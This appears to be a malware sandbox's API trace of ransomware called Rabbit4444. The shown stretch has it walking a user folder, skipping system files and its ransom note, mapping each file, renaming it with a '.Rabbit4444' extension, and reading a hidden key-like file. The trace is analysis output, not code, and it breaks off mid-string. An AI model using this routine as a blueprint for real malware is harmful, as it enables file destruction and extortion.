0x109370 [0072.167] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1106c0 | out: hHeap=0xe0000) returned 1 [0072.168] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0072.168] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0072.168] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0072.168] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0072.168] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0072.168] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16347867902) returned 1 [0072.168] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0072.168] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0072.168] UnmapViewOfFile (lpBaseAddress=0x80000) returned 1 [0072.168] CloseHandle (hObject=0x27c) returned 1 [0072.168] CloseHandle (hObject=0x260) returned 1 [0072.168] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\53e3fbcae3ecf59049f0a1751d56cd9e4bd29256fdf5be6708489d94d0256f30.Rabbit4444") returned 187 [0072.168] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\53e3fbcae3ecf59049f0a1751d56cd9e4bd29256fdf5be6708489d94d0256f30" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\53e3fbcae3ecf59049f0a1751d56cd9e4bd29256fdf5be6708489d94d0256f30"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\53e3fbcae3ecf59049f0a1751d56cd9e4bd29256fdf5be6708489d94d0256f30.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\53e3fbcae3ecf59049f0a1751d56cd9e4bd29256fdf5be6708489d94d0256f30.rabbit4444"), dwFlags=0x1) returned 1 [0072.169] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeae672d, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xdeae672d, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0xdf934a98, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x4150, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="54381f4f59ea8b998d39c632ceef8207bb5623030b6d8c7a2b76f3f9a00e5bd9", cAlternateFileName="54381F~1")) returned 1 [0072.169] lstrcmpiW (lpString1="54381f4f59ea8b998d39c632ceef8207bb5623030b6d8c7a2b76f3f9a00e5bd9", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0072.169] lstrcmpiW (lpString1="54381f4f59ea8b998d39c632ceef8207bb5623030b6d8c7a2b76f3f9a00e5bd9", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0072.169] lstrcmpiW (lpString1="54381f4f59ea8b998d39c632ceef8207bb5623030b6d8c7a2b76f3f9a00e5bd9", lpString2="Rabbit4444.exe") returned -1 [0072.169] lstrcmpiW (lpString1="54381f4f59ea8b998d39c632ceef8207bb5623030b6d8c7a2b76f3f9a00e5bd9", lpString2=".") returned 1 [0072.169] lstrcmpiW (lpString1="54381f4f59ea8b998d39c632ceef8207bb5623030b6d8c7a2b76f3f9a00e5bd9", lpString2="..") returned 1 [0072.169] lstrcmpiW (lpString1="54381f4f59ea8b998d39c632ceef8207bb5623030b6d8c7a2b76f3f9a00e5bd9", lpString2="windows") returned -1 [0072.169] lstrcmpiW (lpString1="54381f4f59ea8b998d39c632ceef8207bb5623030b6d8c7a2b76f3f9a00e5bd9", lpString2="bootmgr") returned -1 [0072.169] lstrcmpiW (lpString1="54381f4f59ea8b998d39c632ceef8207bb5623030b6d8c7a2b76f3f9a00e5bd9", lpString2="pagefile.sys") returned -1 [0072.169] lstrcmpiW (lpString1="54381f4f59ea8b998d39c632ceef8207bb5623030b6d8c7a2b76f3f9a00e5bd9", lpString2="boot") returned -1 [0072.169] lstrcmpiW (lpString1="54381f4f59ea8b998d39c632ceef8207bb5623030b6d8c7a2b76f3f9a00e5bd9", lpString2="ids.txt") returned -1 [0072.170] lstrcmpiW (lpString1="54381f4f59ea8b998d39c632ceef8207bb5623030b6d8c7a2b76f3f9a00e5bd9", lpString2="NTUSER.DAT") returned -1 [0072.170] lstrcpyW (in: lpString1=0x130ec18, lpString2="54381f4f59ea8b998d39c632ceef8207bb5623030b6d8c7a2b76f3f9a00e5bd9" | out: lpString1="54381f4f59ea8b998d39c632ceef8207bb5623030b6d8c7a2b76f3f9a00e5bd9") returned="54381f4f59ea8b998d39c632ceef8207bb5623030b6d8c7a2b76f3f9a00e5bd9" [0072.170] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\54381f4f59ea8b998d39c632ceef8207bb5623030b6d8c7a2b76f3f9a00e5bd9", dwFileAttributes=0x0) returned 1 [0072.170] lstrlenW (lpString="54381f4f59ea8b998d39c632ceef8207bb5623030b6d8c7a2b76f3f9a00e5bd9") returned 64 [0072.170] lstrlenW (lpString="Rabbit4444") returned 10 [0072.170] lstrcmpiW (lpString1="f9a00e5bd9", lpString2="Rabbit4444") returned -1 [0072.170] lstrlenW (lpString=".dll") returned 4 [0072.170] lstrcmpiW (lpString1="5bd9", lpString2=".dll") returned 1 [0072.170] lstrlenW (lpString=".lnk") returned 4 [0072.170] lstrcmpiW (lpString1="5bd9", lpString2=".lnk") returned 1 [0072.170] lstrlenW (lpString=".ini") returned 4 [0072.170] lstrcmpiW (lpString1="5bd9", lpString2=".ini") returned 1 [0072.170] lstrlenW (lpString=".sys") returned 4 [0072.170] lstrcmpiW (lpString1="5bd9", lpString2=".sys") returned 1 [0072.170] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\54381f4f59ea8b998d39c632ceef8207bb5623030b6d8c7a2b76f3f9a00e5bd9" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\54381f4f59ea8b998d39c632ceef8207bb5623030b6d8c7a2b76f3f9a00e5bd9"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0072.171] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0072.171] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16348134287) returned 1 [0072.171] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=16720) returned 1 [0072.171] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0072.171] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0072.171] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4450, lpName=0x0) returned 0x27c [0072.172] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4450) returned 0x80000 [0072.174] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110ae0 [0072.174] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0072.174] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110ae0 | out: hHeap=0xe0000) returned 1 [0072.174] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0072.174] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0072.175] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0072.175] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0072.175] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0072.175] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16348548804) returned 1 [0072.175] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0072.175] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0072.175] UnmapViewOfFile (lpBaseAddress=0x80000) returned 1 [0072.175] CloseHandle (hObject=0x27c) returned 1 [0072.175] CloseHandle (hObject=0x260) returned 1 [0072.175] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\54381f4f59ea8b998d39c632ceef8207bb5623030b6d8c7a2b76f3f9a00e5bd9.Rabbit4444") returned 187 [0072.175] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\54381f4f59ea8b998d39c632ceef8207bb5623030b6d8c7a2b76f3f9a00e5bd9" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\54381f4f59ea8b998d39c632ceef8207bb5623030b6d8c7a2b76f3f9a00e5bd9"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\54381f4f59ea8b998d39c632ceef8207bb5623030b6d8c7a2b76f3f9a00e5bd9.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\54381f4f59ea8b998d39c632ceef8207bb5623030b6d8c7a2b76f3f9a00e5bd9.rabbit4444"), dwFlags=0x1) returned 1 [0072.177] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8e0cded, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc8e0cded, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xcad31a03, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x54aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="55b8377beb7d1d0e9d4fe7b763ce5af97ccf3013e6af720a22569410e155a0c4", cAlternateFileName="55B837~1")) returned 1 [0072.177] lstrcmpiW (lpString1="55b8377beb7d1d0e9d4fe7b763ce5af97ccf3013e6af720a22569410e155a0c4", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0072.177] lstrcmpiW (lpString1="55b8377beb7d1d0e9d4fe7b763ce5af97ccf3013e6af720a22569410e155a0c4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0072.177] lstrcmpiW (lpString1="55b8377beb7d1d0e9d4fe7b763ce5af97ccf3013e6af720a22569410e155a0c4", lpString2="Rabbit4444.exe") returned -1 [0072.177] lstrcmpiW (lpString1="55b8377beb7d1d0e9d4fe7b763ce5af97ccf3013e6af720a22569410e155a0c4", lpString2=".") returned 1 [0072.177] lstrcmpiW (lpString1="55b8377beb7d1d0e9d4fe7b763ce5af97ccf3013e6af720a22569410e155a0c4", lpString2="..") returned 1 [0072.177] lstrcmpiW (lpString1="55b8377beb7d1d0e9d4fe7b763ce5af97ccf3013e6af720a22569410e155a0c4", lpString2="windows") returned -1 [0072.177] lstrcmpiW (lpString1="55b8377beb7d1d0e9d4fe7b763ce5af97ccf3013e6af720a22569410e155a0c4", lpString2="bootmgr") returned -1 [0072.177] lstrcmpiW (lpString1="55b8377beb7d1d0e9d4fe7b763ce5af97ccf3013e6af720a22569410e155a0c4", lpString2="pagefile.sys") returned -1 [0072.177] lstrcmpiW (lpString1="55b8377beb7d1d0e9d4fe7b763ce5af97ccf3013e6af720a22569410e155a0c4", lpString2="boot") returned -1 [0072.177] lstrcmpiW (lpString1="55b8377beb7d1d0e9d4fe7b763ce5af97ccf3013e6af720a22569410e155a0c4", lpString2="ids.txt") returned -1 [0072.177] lstrcmpiW (lpString1="55b8377beb7d1d0e9d4fe7b763ce5af97ccf3013e6af720a22569410e155a0c4", lpString2="NTUSER.DAT") returned -1 [0072.177] lstrcpyW (in: lpString1=0x130ec18, lpString2="55b8377beb7d1d0e9d4fe7b763ce5af97ccf3013e6af720a22569410e155a0c4" | out: lpString1="55b8377beb7d1d0e9d4fe7b763ce5af97ccf3013e6af720a22569410e155a0c4") returned="55b8377beb7d1d0e9d4fe7b763ce5af97ccf3013e6af720a22569410e155a0c4" [0072.177] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\55b8377beb7d1d0e9d4fe7b763ce5af97ccf3013e6af720a22569410e155a0c4", dwFileAttributes=0x0) returned 1 [0072.178] lstrlenW (lpString="55b8377beb7d1d0e9d4fe7b763ce5af97ccf3013e6af720a22569410e155a0c4") returned 64 [0072.178] lstrlenW (lpString="Rabbit4444") returned 10 [0072.178] lstrcmpiW (lpString1="10e155a0c4", lpString2="Rabbit4444") returned -1 [0072.178] lstrlenW (lpString=".dll") returned 4 [0072.178] lstrcmpiW (lpString1="a0c4", lpString2=".dll") returned 1 [0072.178] lstrlenW (lpString=".lnk") returned 4 [0072.178] lstrcmpiW (lpString1="a0c4", lpString2=".lnk") returned 1 [0072.178] lstrlenW (lpString=".ini") returned 4 [0072.178] lstrcmpiW (lpString1="a0c4", lpString2=".ini") returned 1 [0072.178] lstrlenW (lpString=".sys") returned 4 [0072.178] lstrcmpiW (lpString1="a0c4", lpString2=".sys") returned 1 [0072.178] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\55b8377beb7d1d0e9d4fe7b763ce5af97ccf3013e6af720a22569410e155a0c4" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\55b8377beb7d1d0e9d4fe7b763ce5af97ccf3013e6af720a22569410e155a0c4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0072.179] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0072.179] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16348961902) returned 1 [0072.179] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=21674) returned 1 [0072.179] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0072.179] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0072.179] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x57b0, lpName=0x0) returned 0x27c [0072.180] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x57b0) returned 0x80000 [0072.182] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110be8 [0072.182] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0072.182] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110be8 | out: hHeap=0xe0000) returned 1 [0072.183] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0072.183] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0072.183] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0072.183] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0072.183] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0072.183] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16349367048) returned 1 [0072.183] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0072.183] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0072.183] UnmapViewOfFile (lpBaseAddress=0x80000) returned 1 [0072.183] CloseHandle (hObject=0x27c) returned 1 [0072.183] CloseHandle (hObject=0x260) returned 1 [0072.183] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\55b8377beb7d1d0e9d4fe7b763ce5af97ccf3013e6af720a22569410e155a0c4.Rabbit4444") returned 187 [0072.183] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\55b8377beb7d1d0e9d4fe7b763ce5af97ccf3013e6af720a22569410e155a0c4" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\55b8377beb7d1d0e9d4fe7b763ce5af97ccf3013e6af720a22569410e155a0c4"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\55b8377beb7d1d0e9d4fe7b763ce5af97ccf3013e6af720a22569410e155a0c4.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\55b8377beb7d1d0e9d4fe7b763ce5af97ccf3013e6af720a22569410e155a0c4.rabbit4444"), dwFlags=0x1) returned 1 [0072.184] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2863e61, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xf2863e61, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0xf3c81c49, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x1139dc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5d09ce56b3b281be3dafbc4790edb6df5c9162ac126141d13ef5692ac6f76ea3", cAlternateFileName="5D09CE~1")) returned 1 [0072.184] lstrcmpiW (lpString1="5d09ce56b3b281be3dafbc4790edb6df5c9162ac126141d13ef5692ac6f76ea3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0072.184] lstrcmpiW (lpString1="5d09ce56b3b281be3dafbc4790edb6df5c9162ac126141d13ef5692ac6f76ea3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0072.184] lstrcmpiW (lpString1="5d09ce56b3b281be3dafbc4790edb6df5c9162ac126141d13ef5692ac6f76ea3", lpString2="Rabbit4444.exe") returned -1 [0072.184] lstrcmpiW (lpString1="5d09ce56b3b281be3dafbc4790edb6df5c9162ac126141d13ef5692ac6f76ea3", lpString2=".") returned 1 [0072.184] lstrcmpiW (lpString1="5d09ce56b3b281be3dafbc4790edb6df5c9162ac126141d13ef5692ac6f76ea3", lpString2="..") returned 1 [0072.184] lstrcmpiW (lpString1="5d09ce56b3b281be3dafbc4790edb6df5c9162ac126141d13ef5692ac6f76ea3", lpString2="windows") returned -1 [0072.185] lstrcmpiW (lpString1="5d09ce56b3b281be3dafbc4790edb6df5c9162ac126141d13ef5692ac6f76ea3", lpString2="bootmgr") returned -1 [0072.185] lstrcmpiW (lpString1="5d09ce56b3b281be3dafbc4790edb6df5c9162ac126141d13ef5692ac6f76ea3", lpString2="pagefile.sys") returned -1 [0072.185] lstrcmpiW (lpString1="5d09ce56b3b281be3dafbc4790edb6df5c9162ac126141d13ef5692ac6f76ea3", lpString2="boot") returned -1 [0072.185] lstrcmpiW (lpString1="5d09ce56b3b281be3dafbc4790edb6df5c9162ac126141d13ef5692ac6f76ea3", lpString2="ids.txt") returned -1 [0072.185] lstrcmpiW (lpString1="5d09ce56b3b281be3dafbc4790edb6df5c9162ac126141d13ef5692ac6f76ea3", lpString2="NTUSER.DAT") returned -1 [0072.185] lstrcpyW (in: lpString1=0x130ec18, lpString2="5d09ce56b3b281be3dafbc4790edb6df5c9162ac126141d13ef5692ac6f76ea3" | out: lpString1="5d09ce56b3b281be3dafbc4790edb6df5c9162ac126141d13ef5692ac6f76ea3") returned="5d09ce56b3b281be3dafbc4790edb6df5c9162ac126141d13ef5692ac6f76ea3" [0072.185] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\5d09ce56b3b281be3dafbc4790edb6df5c9162ac126141d13ef5692ac6f76ea3", dwFileAttributes=0x0) returned 1 [0072.185] lstrlenW (lpString="5d09ce56b3b281be3dafbc4790edb6df5c9162ac126141d13ef5692ac6f76ea3") returned 64 [0072.185] lstrlenW (lpString="Rabbit4444") returned 10 [0072.185] lstrcmpiW (lpString1="2ac6f76ea3", lpString2="Rabbit4444") returned -1 [0072.185] lstrlenW (lpString=".dll") returned 4 [0072.185] lstrcmpiW (lpString1="6ea3", lpString2=".dll") returned 1 [0072.185] lstrlenW (lpString=".lnk") returned 4 [0072.185] lstrcmpiW (lpString1="6ea3", lpString2=".lnk") returned 1 [0072.185] lstrlenW (lpString=".ini") returned 4 [0072.185] lstrcmpiW (lpString1="6ea3", lpString2=".ini") returned 1 [0072.185] lstrlenW (lpString=".sys") returned 4 [0072.185] lstrcmpiW (lpString1="6ea3", lpString2=".sys") returned 1 [0072.185] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\5d09ce56b3b281be3dafbc4790edb6df5c9162ac126141d13ef5692ac6f76ea3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\5d09ce56b3b281be3dafbc4790edb6df5c9162ac126141d13ef5692ac6f76ea3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0072.186] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0072.186] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16349783648) returned 1 [0072.187] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1128924) returned 1 [0072.187] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0072.187] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1018d0 [0072.187] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x113ce0, lpName=0x0) returned 0x27c [0072.188] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x113ce0) returned 0x3110000 Thread: id = 13 os_tid = 0x540 [0043.563] RtlInterlockedPopEntrySList (in: ListHead=0xf6390 | out: ListHead=0xf6390) returned 0xf6530 [0043.563] lstrcpynW (in: lpString1=0x11ce920, lpString2="Z:\\Recovery", iMaxLength=2048 | out: lpString1="Z:\\Recovery") returned="Z:\\Recovery" [0043.563] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6548 | out: hHeap=0xe0000) returned 1 [0043.563] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6528 | out: hHeap=0xe0000) returned 1 [0043.563] lstrcatW (in: lpString1="", lpString2="Z:\\Recovery" | out: lpString1="Z:\\Recovery") returned="Z:\\Recovery" [0043.563] lstrcatW (in: lpString1="Z:\\Recovery", lpString2="\\" | out: lpString1="Z:\\Recovery\\") returned="Z:\\Recovery\\" [0043.563] lstrcatW (in: lpString1="Z:\\Recovery\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="Z:\\Recovery\\.BFC0E91B00AE8A0620D3") returned="Z:\\Recovery\\.BFC0E91B00AE8A0620D3" [0043.563] CreateFileW (lpFileName="Z:\\Recovery\\.BFC0E91B00AE8A0620D3" (normalized: "z:\\recovery\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0043.563] lstrcatW (in: lpString1="", lpString2="Z:\\Recovery" | out: lpString1="Z:\\Recovery") returned="Z:\\Recovery" [0043.563] lstrcatW (in: lpString1="Z:\\Recovery", lpString2="\\" | out: lpString1="Z:\\Recovery\\") returned="Z:\\Recovery\\" [0043.563] lstrcatW (in: lpString1="Z:\\Recovery\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="Z:\\Recovery\\.BFC0E91B00AE8A0620D3") returned="Z:\\Recovery\\.BFC0E91B00AE8A0620D3" [0043.563] CreateFileW (lpFileName="Z:\\Recovery\\.BFC0E91B00AE8A0620D3" (normalized: "z:\\recovery\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0043.564] ReadFile (in: hFile=0x298, lpBuffer=0x11cc508, nNumberOfBytesToRead=0x3d4, lpNumberOfBytesRead=0x11cc504, lpOverlapped=0x0 | out: lpBuffer=0x11cc508*, lpNumberOfBytesRead=0x11cc504*=0x3d4, lpOverlapped=0x0) returned 1 [0043.564] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0x105470 [0043.564] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0043.564] lstrlenA (lpString="b4 JJ up So Ri VJ zb Gs aV zP xm 6E 9W Y1 vI Np\r\nr8 AZ 3V e2 /2 HZ 3m c7 jm eL tD W+ B4 uf S1 ti\r\nDt sJ m2 cw Jt Ud T8 2Z Xb FK Va Cd 1K fR kD X2\r\nwj Ht G7 BW tA mm +H YT 9R vU I5 y9 eh /F 4J GH\r\n+j x1 qZ 6+ tf 2I zQ Sh PI ei T0 Rt U2 M7 1p wT\r\n9Q VS Zp JM Ua UA Lf YT AB yP nf PD Vf 7J Lg s2\r\nmy bV QN IS Bd XQ DS OB tJ sa Hs 5K uR Nj xr sH\r\nNV pi 1D zP l9 V1 Gq 0k Cn WK Om 0Q /F fm oS 55\r\nH5 Jx Dd zc lS Lm uh 0e Qb fg FR Wl lf 0e zP m6\r\nzz On 3h I+ Ux /I cs 0D bM zU /e lR FE q5 +b 53\r\niW eW Ks Ee ZN qJ gP vb 3c 1n iv O5 y3 ih f3 z4\r\n8y aZ jq Oy +L 13 Oj qv Qr Kd hl 2g SU r3 Mv 